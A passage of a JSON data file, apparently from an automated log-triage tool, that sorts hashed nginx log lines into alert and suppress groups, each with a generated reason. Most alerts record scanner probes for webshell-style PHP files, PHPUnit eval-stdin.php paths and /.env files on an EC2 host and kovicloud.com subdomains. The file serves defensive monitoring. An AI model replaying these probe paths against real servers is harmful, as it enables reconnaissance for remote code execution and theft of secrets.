"c5b3b8959850e8e9dffb7f33dd4bf21bd9d66f4ad4c11b3e04a165583601c6a6", "source": "auto", "reason": "Nginx open() failed for a PHP file that does not exist, indicating a possible probe for PHP files or webshells.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/ws83.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /ws83.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:08:14.062334244Z" }, "c7095ee15a48e99852863472ad1c609bbafb3cadb3c881432fafe2dfe199c6fb": { "type": "hash", "value": "c7095ee15a48e99852863472ad1c609bbafb3cadb3c881432fafe2dfe199c6fb", "source": "auto", "reason": "An error log from nginx referencing a missing security.txt file. This could be a casual misconfiguration or a scanner probing for security.txt; not clearly malicious but worth monitoring.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/security.txt\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /security.txt HTTP/1.1\", host: \"54.200.221.0\"", "created_at": "2026-03-20T09:48:47.236395065Z" }, "c8149e1997227cd45185b79f0f7a29acd95111069b404cd14cbea6a08db23e82": { "type": "hash", "value": "c8149e1997227cd45185b79f0f7a29acd95111069b404cd14cbea6a08db23e82", "source": "auto", "reason": "Error log showing an access attempt to a sensitive phpunit script path (eval-stdin.php) which is a common target for PHP unit framework exploits; not confirmed malicious but warrants monitoring.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:46:46.262443497Z" }, "c85c16147933ffaf3e882ae69d6129bfd7b027c1693df6a7b405b118733f0c56": { "type": "hash", "value": "c85c16147933ffaf3e882ae69d6129bfd7b027c1693df6a7b405b118733f0c56", "source": "auto", "reason": "The log shows an nginx open() failure for a PHP file (wen.php) which is a common probe target. While not definitive malicious activity, it indicates potential probing for web shell or misconfigured paths.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/wen.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /wen.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:04:27.537667891Z" }, "cbb61cc87acb8f3f587c3be8a17e22172ca1ab4617ef613b037837ecec17fc99": { "type": "hash", "value": "cbb61cc87acb8f3f587c3be8a17e22172ca1ab4617ef613b037837ecec17fc99", "source": "auto", "reason": "Nginx error shows open() failed for a specific ACME challenge token path; repeated missing challenge files can indicate failed/aborted certificate validation attempts or misconfiguration rather than normal operation.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/.well-known/acme-challenge/iYFHqno9VfY8hIy2K3E1W8C_3ZmBGd0Zov_6RmDmY3g\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /.well-known/acme-challenge/iYFHqno9VfY8hIy2K3E1W8C_3ZmBGd0Zov_6RmDmY3g HTTP/1.1\", host: \"login.admin.kovicloud.com\"", "created_at": "2026-03-19T22:31:35.193275969Z" }, "ccb3ea147bcb1b6de6a7a3fdf8f57fc8cc198288ce44fcb41b1d60aafc3a223d": { "type": "hash", "value": "ccb3ea147bcb1b6de6a7a3fdf8f57fc8cc198288ce44fcb41b1d60aafc3a223d", "source": "auto", "reason": "Access attempt to wp-act.php suggests probing for WordPress vulnerability; the file does not exist but the request pattern indicates potential exploitation attempts.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/wp-act.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /wp-act.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:01:40.970261049Z" }, "cdae2bb0e0551bd2c98d96a38210e26f2d88a17fde93e50964917618fa6580ed": { "type": "hash", "value": "cdae2bb0e0551bd2c98d96a38210e26f2d88a17fde93e50964917618fa6580ed", "source": "auto", "reason": "Nginx open() failure for a PHP file under /tx78.php suggests a potential probe for PHP file execution or hidden admin scripts; common in scanning attempts.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/tx78.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /tx78.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:09:57.568506454Z" }, "cdb80794aebf2a4e8a6f4291a689729a9e217f4e71c164ed1375d732921a2f9a": { "type": "hash", "value": "cdb80794aebf2a4e8a6f4291a689729a9e217f4e71c164ed1375d732921a2f9a", "source": "auto", "reason": "Access pattern to /jp.php and missing file could indicate a targeted probe or misconfigured route. It's an error but not definitive evidence of compromise.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/jp.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /jp.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:06:05.188675867Z" }, "cffc8c0db7310977d971988dc86de98ecc10e5d87cf26708558f38c8f8c8de84": { "type": "hash", "value": "cffc8c0db7310977d971988dc86de98ecc10e5d87cf26708558f38c8f8c8de84", "source": "auto", "reason": "A request for wp-good.php with an open() failure suggests probing for a WordPress file, which could indicate vulnerability scanning against the web server.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/wp-good.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /wp-good.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:08:02.731640596Z" }, "d042bac46317f69ef648034ae4769c497cdb9a55c7d72f0097601afc38831b95": { "type": "hash", "value": "d042bac46317f69ef648034ae4769c497cdb9a55c7d72f0097601afc38831b95", "source": "auto", "reason": "Probe-like access to phpunit path in nginx error log; indicates potential vulnerability scan", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:48:05.107389451Z" }, "d5fa393a45c22fa2c9b8555860d88f46652ce60d9de6e64617b74b90394aa97a": { "type": "hash", "value": "d5fa393a45c22fa2c9b8555860d88f46652ce60d9de6e64617b74b90394aa97a", "source": "auto", "reason": "A request for a PHP file ws81.php resulted in a file-not-found error, which may indicate probing for vulnerable PHP assets.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/ws81.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /ws81.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:08:53.103500392Z" }, "d6811f94dee481998fc7429d9d42d83d6fdd52167c6274c6d2bf05510ce2b3fb": { "type": "hash", "value": "d6811f94dee481998fc7429d9d42d83d6fdd52167c6274c6d2bf05510ce2b3fb", "source": "auto", "reason": "Access to a PHP file that does not exist (bo.php) suggests probing for vulnerable entry points often associated with web app attacks.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/bo.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /bo.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:02:47.312355733Z" }, "d8f5bde1239ec6c35e4cbda8cf03c3add1b31e385e9fba164d8a271d1444b917": { "type": "hash", "value": "d8f5bde1239ec6c35e4cbda8cf03c3add1b31e385e9fba164d8a271d1444b917", "source": "auto", "reason": "Access attempt to a phpunit file path commonly targeted in probes; shows potential attempt to locate vulnerable PHP tooling", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/lib/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:46:28.575976879Z" }, "d95270e3b9d212ac541e4a840376c13bc75b34281c5419160cd4da222a1583c7": { "type": "hash", "value": "d95270e3b9d212ac541e4a840376c13bc75b34281c5419160cd4da222a1583c7", "source": "auto", "reason": "NGINX error log showing a missing file open() for a PHP file suggests a potential probe or misconfiguration; not definitive malicious activity but warrants attention.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/55b76.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /55b76.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:07:52.278610323Z" }, "d9d11c243163d60731443b7a70a447629bf9f610ee95fa95606076dedf4e9ee9": { "type": "hash", "value": "d9d11c243163d60731443b7a70a447629bf9f610ee95fa95606076dedf4e9ee9", "source": "auto", "reason": "An error log showing an attempt to open a PHP file (ms-edit.php) in the webroot. This could indicate probing for vulnerable PHP scripts or misconfigurations, but is not definitive malicious activity.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/ms-edit.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /ms-edit.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:04:16.57857378Z" }, "dbf2036bac6baffaee8e5461cb67c0ac9d8bc40356f514afc84fd7a203dcc55c": { "type": "hash", "value": "dbf2036bac6baffaee8e5461cb67c0ac9d8bc40356f514afc84fd7a203dcc55c", "source": "auto", "reason": "An error log showing a missing file in response to a request for wp5.php suggests a potential probing for WordPress-related files; not definitively malicious but worth monitoring.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/wp5.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /wp5.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:04:36.405459656Z" }, "dcfb3942c54bd2a8ae47ea567f54ca3f2f86dbec9952ba9ee43a52f1c4d9c581": { "type": "hash", "value": "dcfb3942c54bd2a8ae47ea567f54ca3f2f86dbec9952ba9ee43a52f1c4d9c581", "source": "auto", "reason": "Nginx/Docker access log shows an HTTP POST to root path with a 405 (method not allowed) from an external IP; may indicate probing or an unexpected client behavior.", "original_line": "\"test3.admin.kovicloud.com\" \"\u003cVAR\u003e\" 405 150 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-19T22:36:16.018020983Z" }, "dde7adb0a1dc4b9a54969c7989add897be9f9492813153eb5042c0b59a1c7d33": { "type": "hash", "value": "dde7adb0a1dc4b9a54969c7989add897be9f9492813153eb5042c0b59a1c7d33", "source": "auto", "reason": "An HTTP request attempted to access a PHP file (ms.php) that does not exist, which can indicate probing for vulnerable endpoints. It's an unusual error and warrants attention but not definitive maliciousness.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/ms.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /ms.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:02:11.382773086Z" }, "e17bb69d9dfc3971ec4ebab7535d01fbad6d91ff92b3ff2b0c8bea63912f3451": { "type": "hash", "value": "e17bb69d9dfc3971ec4ebab7535d01fbad6d91ff92b3ff2b0c8bea63912f3451", "source": "auto", "reason": "Requested PHP file nw.php not found; could indicate probing for vulnerable PHP files on the server.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/nw.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET //nw.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:05:41.526979125Z" }, "e2b9cd2a52026d3d4923ce4b9fd10054e8425387137b5d79c20f89b42130deb7": { "type": "hash", "value": "e2b9cd2a52026d3d4923ce4b9fd10054e8425387137b5d79c20f89b42130deb7", "source": "auto", "reason": "Attempt to access a WordPress PHP file that does not exist; could indicate probing for vulnerable paths.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/wp-access.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /wp-access.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:09:34.530023344Z" }, "e45a93c6e8130655981be605d6680004f3b16b0353f0bf0ad43c9bb969f45caa": { "type": "hash", "value": "e45a93c6e8130655981be605d6680004f3b16b0353f0bf0ad43c9bb969f45caa", "source": "auto", "reason": "Access to a PHP file under /5b9ac.php causing an open() failure suggests probing for vulnerable PHP scripts or missing files, a common web app attack pattern.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/5b9ac.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /5b9ac.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:06:16.554085895Z" }, "e4c41b0f8067d61eeb8a02ca97fa336ee057cd7e8949f472202ca8a2d29f7bc5": { "type": "hash", "value": "e4c41b0f8067d61eeb8a02ca97fa336ee057cd7e8949f472202ca8a2d29f7bc5", "source": "auto", "reason": "An actuator health endpoint missing its file under nginx, resulting in a failed health check. This is an abnormal health endpoint failure and could indicate misconfiguration or deployment issues, warranting monitoring but not definitive malicious activity.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/actuator/health\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /actuator/health HTTP/1.1\", host: \"54.200.221.0\"", "created_at": "2026-03-20T02:46:26.101391308Z" }, "e64c4c2198f05d1e8cf36707bcf69a416bfdf04590a6dcbaf461161b4d8a99f6": { "type": "hash", "value": "e64c4c2198f05d1e8cf36707bcf69a416bfdf04590a6dcbaf461161b4d8a99f6", "source": "auto", "reason": "An error log showing a client requesting sid3.php which does not exist could indicate probing for vulnerable PHP files or misconfigured defaults. Not definitively malicious, but warrants alerting.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/sid3.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /sid3.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:07:26.987911571Z" }, "e6a6f175009f527d3f08973d32ebf08cea892e1c5373dcb9f47b812dd460bf6b": { "type": "hash", "value": "e6a6f175009f527d3f08973d32ebf08cea892e1c5373dcb9f47b812dd460bf6b", "source": "auto", "reason": "Request to fetch the /.env file from a remote IP using curl; HTTP 403 indicates blocked, but attempting to access sensitive env file is a common reconnaissance or misconfiguration probe.", "original_line": "\"api.admin.kovicloud.com\" \"\u003cVAR\u003e\" 403 146 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T00:00:31.469839744Z" }, "e6b789b9d579ae62a6bd3ee80bd3fdbb5e02eaee53f8619090fd967d2773000f": { "type": "hash", "value": "e6b789b9d579ae62a6bd3ee80bd3fdbb5e02eaee53f8619090fd967d2773000f", "source": "auto", "reason": "Attempted access to a potentially sensitive PHP file (wp_filemanager.php) under a WordPress plugin; such files are common targets for exploitation attempts.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/wp-content/plugins/hellopress/wp_filemanager.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T13:59:00.969894066Z" }, "ea26a01860292e567a11253bd4970cae00128849cdf37b3c83ad3831708118b6": { "type": "hash", "value": "ea26a01860292e567a11253bd4970cae00128849cdf37b3c83ad3831708118b6", "source": "auto", "reason": "An HTTP request tried to access ws60.php and nginx failed to find the file. Could indicate probing for PHP files or misconfiguration.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/ws60.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /ws60.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:02:38.912606076Z" }, "ec1918d8f9d0caf3918e072d43f038718698a918dc4e7e1d63a1af2902e1efcd": { "type": "hash", "value": "ec1918d8f9d0caf3918e072d43f038718698a918dc4e7e1d63a1af2902e1efcd", "source": "auto", "reason": "Access to /.env is a common probe to discover sensitive environment configuration; the 302 response may indicate a redirect or misconfiguration but the pattern is indicative of a potential information disclosure probe.", "original_line": "\"media.admin.kovicloud.com\" \"\u003cVAR\u003e\" 302 138 \"\u003cVAR\u003e\" \"\u003cVAR\u003e\" \"\u003cVAR\u003e\"", "created_at": "2026-03-20T05:21:49.610546686Z" }, "ef1448220cd65813b1c50707801e4d4033a57420de73c3c24d0cb70f1ed48dab": { "type": "hash", "value": "ef1448220cd65813b1c50707801e4d4033a57420de73c3c24d0cb70f1ed48dab", "source": "auto", "reason": "Attempted access to a PHP file (ws77.php) that does not exist; could indicate probing or misconfiguration.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/ws77.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /ws77.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:00:58.628702334Z" }, "f18bef586feaaeb1ac95993c3116e35c741d3f89768bffde861966d807a36d76": { "type": "hash", "value": "f18bef586feaaeb1ac95993c3116e35c741d3f89768bffde861966d807a36d76", "source": "auto", "reason": "Access attempt to a PHPUnit file path is a common probe for phpunit-related vulnerabilities.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:46:56.903354586Z" }, "f46e7b8a79435f2367cedca0724c916814be6931e08d61f15fb978d49f95ac56": { "type": "hash", "value": "f46e7b8a79435f2367cedca0724c916814be6931e08d61f15fb978d49f95ac56", "source": "auto", "reason": "HTTP error indicating missing file gettest.php; could indicate probing or misconfiguration.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/gettest.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /gettest.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:04:55.478119097Z" }, "f499f48221bd8924c1b8f2013ea6ad2dad2b6467409535a47997df0fa17ec90d": { "type": "hash", "value": "f499f48221bd8924c1b8f2013ea6ad2dad2b6467409535a47997df0fa17ec90d", "source": "auto", "reason": "Access to /b.php in web server logs is a common probe for PHP shells or misconfigurations; the file does not exist, but the attempt itself is suspicious and warrants monitoring.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/b.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /b.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:03:27.794066887Z" }, "f4b507c1e8774b01699dd7e8e54198691740a6574e6991981b682b1bd7e5d1c5": { "type": "hash", "value": "f4b507c1e8774b01699dd7e8e54198691740a6574e6991981b682b1bd7e5d1c5", "source": "auto", "reason": "Request attempting to access a phpunit evaluation script (eval-stdin.php) which is a common probe for RCE/PII via PHP unit; file not found but indicative of exploitation attempt.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/vendor/phpunit/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:45:40.481264815Z" }, "f57adf900a6626465288bb3de2bc79e4cca2d5517bacaf8604612425211a136b": { "type": "hash", "value": "f57adf900a6626465288bb3de2bc79e4cca2d5517bacaf8604612425211a136b", "source": "auto", "reason": "An access attempt to a likely PHP file (domains.php) resulting in a file-not-found error can indicate probing for sensitive endpoints or misconfigurations. Not clearly malicious, but warrants monitoring.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/domains.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /domains.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:08:56.823358428Z" }, "f7a933ff0a02c43f4d185541d46247ddeae47a8fc76cff855bb0b3747fc8bc8c": { "type": "hash", "value": "f7a933ff0a02c43f4d185541d46247ddeae47a8fc76cff855bb0b3747fc8bc8c", "source": "auto", "reason": "Access attempt to a phpunit file path via HTTP request; commonly probed for known PHP unit vulnerabilities.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:45:55.937432264Z" }, "f9290a4e5a68b892dc2d490d3c31d37917741df64f0891fcf5953d825923ad7d": { "type": "hash", "value": "f9290a4e5a68b892dc2d490d3c31d37917741df64f0891fcf5953d825923ad7d", "source": "auto", "reason": "An access attempt to a Wordpress core file (wp-blog-header.php) resulted in a missing file error, suggesting probing or misconfigured requests targeting Wordpress paths.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/wp-blog-header.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /wp-blog-header.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:07:41.412298236Z" }, "fb65481c4a48afae5e02facb5d703172abc2c80ac7991ae1ca06e823233556f6": { "type": "hash", "value": "fb65481c4a48afae5e02facb5d703172abc2c80ac7991ae1ca06e823233556f6", "source": "auto", "reason": "Access attempt to a phpunit file path (eval-stdin.php) typical of probe or exploit attempts against PHP frameworks.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/lib/phpunit/phpunit/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:46:23.520641776Z" }, "fbfe13a6724b636492677e8e9a0db282d56d559c118855a98593c3e49dfe3f13": { "type": "hash", "value": "fbfe13a6724b636492677e8e9a0db282d56d559c118855a98593c3e49dfe3f13", "source": "auto", "reason": "Attempted access to a phpunit file path via nginx, which is a common probe for known vulnerabilities or misconfigurations.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:47:04.236988057Z" }, "fc36147bcd103fcfb194effe9ed2a715a2352a65dc91d879bcacf3fead2a15c0": { "type": "hash", "value": "fc36147bcd103fcfb194effe9ed2a715a2352a65dc91d879bcacf3fead2a15c0", "source": "auto", "reason": "Request for a potentially sensitive PHP file (/public/ws49.php) resulting in a file-not-found error; could indicate probing for vulnerable assets or misconfiguration.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/public/ws49.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /public/ws49.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:04:01.725439431Z" }, "fc5cd4e7974cc182896173263a783520cca5a9350216cf78f59c5d881977ecba": { "type": "hash", "value": "fc5cd4e7974cc182896173263a783520cca5a9350216cf78f59c5d881977ecba", "source": "auto", "reason": "Access attempt to a likely PHPUnit path under nginx suggests probing for vulnerable PHP code paths. The file does not exist, but the pattern is a known reconnaissance/attack vector.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\", host: \"54.200.221.0:80\"", "created_at": "2026-03-20T13:45:21.113119619Z" }, "fdb3f01af9d673c0684b62d062e0fc46628b194f268fdd07cd8bfddd3dc549fb": { "type": "hash", "value": "fdb3f01af9d673c0684b62d062e0fc46628b194f268fdd07cd8bfddd3dc549fb", "source": "auto", "reason": "Access attempt to a non-existent wp-ssfc.php file via HTTP GET, typical of probing for vulnerable PHP files.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/wp-ssfc.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /wp-ssfc.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T13:59:48.493754652Z" }, "ff06cbc095137cd2d104b7d239d943a72c2b7b3f26d4e8703f0390f6b18b5c61": { "type": "hash", "value": "ff06cbc095137cd2d104b7d239d943a72c2b7b3f26d4e8703f0390f6b18b5c61", "source": "auto", "reason": "Access to /term.php could indicate probing for PHP endpoints; the file does not exist, but repeated requests to PHP files are common in automated scans.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/term.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /term.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:00:53.667151214Z" }, "ff3b7f0bc0ba99dedcead5c247944c5cca0f449a3a24a940b97a327583b24604": { "type": "hash", "value": "ff3b7f0bc0ba99dedcead5c247944c5cca0f449a3a24a940b97a327583b24604", "source": "auto", "reason": "Unauthorized-looking request to a PHP file combined with an open() failure indicates probing or misconfigured route, common in vulnerability scanning.", "original_line": "[error] \u003cPID\u003e: *\u003cCONN\u003e open() \"/usr/share/nginx/default/8573.php\" failed (2: No such file or directory), client: \u003cCLIENT\u003e, server: _, request: \"GET /8573.php HTTP/1.1\", host: \"ec2-54-200-221-0.us-west-2.compute.amazonaws.com\"", "created_at": "2026-03-20T14:05:12.570471168Z" } } }, "suppress": { "hashes": { "166a3d5eefcc53531caf5e7213ec6b513a9e5a21ee513d50e160b249c2f50951": { "type": "hash", "value": "166a3d5eefcc53531caf5e7213ec6b513a9e5a21ee513d50e160b249c2f50951", "source": "auto", "reason": "Nginx warning about a deprecated configuration directive; non-exploitative and typically routine during upgrades.", "original_line": "[warn] \u003cPID\u003e: the \"listen ... http2\" directive is deprecated, use the \"http2\" directive instead in /etc/nginx/conf.d/captain.conf:173", "created_at": "2026-03-19T22:31:41.333769449Z" }, "9a85ba71280992d6e29fbfeed41599c9731eabf4c67de47260d4d9e15069c860": { "type": "hash", "value": "9a85ba71280992d6e29fbfeed41599c9731eabf4c67de47260d4d9e15069c860", "source": "auto", "reason": "Nginx startup/config warning about protocol options being redefined; usually configuration churn/harmless but not necessarily an attack.", "original_line": "[warn] \u003cPID\u003e: protocol options redefined for 0.0.0.0:443 in /etc/nginx/conf.d/captain.conf:89", "created_at": "2026-03-19T22:31:40.374631051Z" }, "b040ecb1433ebd017dda012cf1d85ab54e33b717139c1d59bb90063a48aac995": { "type": "hash", "value": "b040ecb1433ebd017dda012cf1d85ab54e33b717139c1d59bb90063a48aac995", "source": "auto", "reason": "Nginx warns about a deprecated directive; this is typically non-actionable unless you plan config cleanup.", "original_line": "[warn] \u003cPID\u003e: the \"listen ... http2\" directive is deprecated, use the \"http2\" directive instead in /etc/nginx/conf.d/captain.conf:89", "created_at": 